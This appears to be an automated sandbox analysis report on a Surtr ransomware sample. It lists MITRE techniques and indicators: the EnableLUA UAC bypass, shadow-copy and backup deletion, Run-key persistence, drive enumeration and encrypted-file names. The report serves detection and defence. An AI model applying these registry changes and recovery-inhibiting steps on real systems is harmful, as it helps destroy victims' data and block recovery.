surtr | 5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b

Data Destruction

T1485

pid	Process
2788	fsutil.exe

Detects Surtr Payload 1 IoCs

resource	yara_rule
behavioral2/memory/1796-154-0x0000000000400000-0x000000000050B000-memory.dmp	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

pid	Process
4496	bcdedit.exe
3616	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

pid	Process
2412	wbadmin.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1796-132-0x0000000000400000-0x000000000050B000-memory.dmp	upx
behavioral2/memory/1796-154-0x0000000000400000-0x000000000050B000-memory.dmp	upx
behavioral2/files/0x0002000000022dfa-198.dat	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\desktop.ini	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\G:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\W:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\O:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\P:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\E:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\T:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\V:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\S:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\Y:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\U:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\B:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\I:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\J:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\Q:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\L:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\F:	svchost.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\A:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\N:	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-pl.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTest-ul-oob.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-pl.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\PrivateData_t0pq1466jbkptx.surt	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_PrepidBypass-ul-oob.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_OEM_Perp-ul-phn.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File created	C:\Program Files\Common Files\DESIGNER\SURTR_README.txt	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Grace-ul-oob.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_OEM_Perp-pl.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Trial-ul-oob.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ppd.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Trial-ppd.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\SURTR_README.txt	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\deploy\ffjcext.zip	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_KMS_Automation-ppd.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\jmxremote.password.template	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_KMS_Client-ppd.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office-client15.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-ppd.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File created	C:\Program Files\Common Files\microsoft shared\SURTR_README.txt	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_MAK_AE-ul-phn.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\SURTR_README.hta	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\ext\dnsns.jar	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial5-ppd.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\sv-SE\SURTR_README.txt	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-ul-phn.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_OEM_Perp-ppd.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Retail-pl.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipsptg.xml	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription2-ul-oob.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-oob.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_MAK_AE-ul-oob.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Retail-ul-oob.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_MAK-ppd.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-ul-oob.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019VL_MAK_AE-pl.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ORGCHART.CHM.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File created	C:\Program Files\Common Files\microsoft shared\OFFICE16\PrivateData_t0pq1466jbkptx.surt	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\PrivateData_t0pq1466jbkptx.surt	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Grace-ppd.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-ppd.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp2-ul-phn.xrm-ms	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial2-pl.xrm-ms.[[email protected]].[t0pq1466jbkptx].Surtr	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
1620	schtasks.exe
3988	schtasks.exe

Interacts with shadow copies 2 TTPs 51 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

pid	Process
3772	vssadmin.exe
3572	vssadmin.exe
116	vssadmin.exe
5136	vssadmin.exe
6596	vssadmin.exe
6660	vssadmin.exe
4060	vssadmin.exe
260	vssadmin.exe
1904	vssadmin.exe
6244	vssadmin.exe
6236	vssadmin.exe
6516	vssadmin.exe
6668	vssadmin.exe
1556	vssadmin.exe
1112	vssadmin.exe
1900	vssadmin.exe
6152	vssadmin.exe
6424	vssadmin.exe
6480	vssadmin.exe
6720	vssadmin.exe
3424	vssadmin.exe
2004	vssadmin.exe
896	vssadmin.exe
2840	vssadmin.exe
6492	vssadmin.exe
4364	vssadmin.exe
3852	vssadmin.exe
2708	vssadmin.exe
3632	vssadmin.exe
3604	vssadmin.exe
6208	vssadmin.exe
6292	vssadmin.exe
6376	vssadmin.exe
2592	vssadmin.exe
1044	vssadmin.exe
116	vssadmin.exe
4212	vssadmin.exe
4596	vssadmin.exe
1664	vssadmin.exe
6368	vssadmin.exe
5032	vssadmin.exe
5088	vssadmin.exe
1512	vssadmin.exe
2188	vssadmin.exe
4164	vssadmin.exe
4672	vssadmin.exe
2212	vssadmin.exe
6544	vssadmin.exe
6676	vssadmin.exe
6760	vssadmin.exe
6712	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
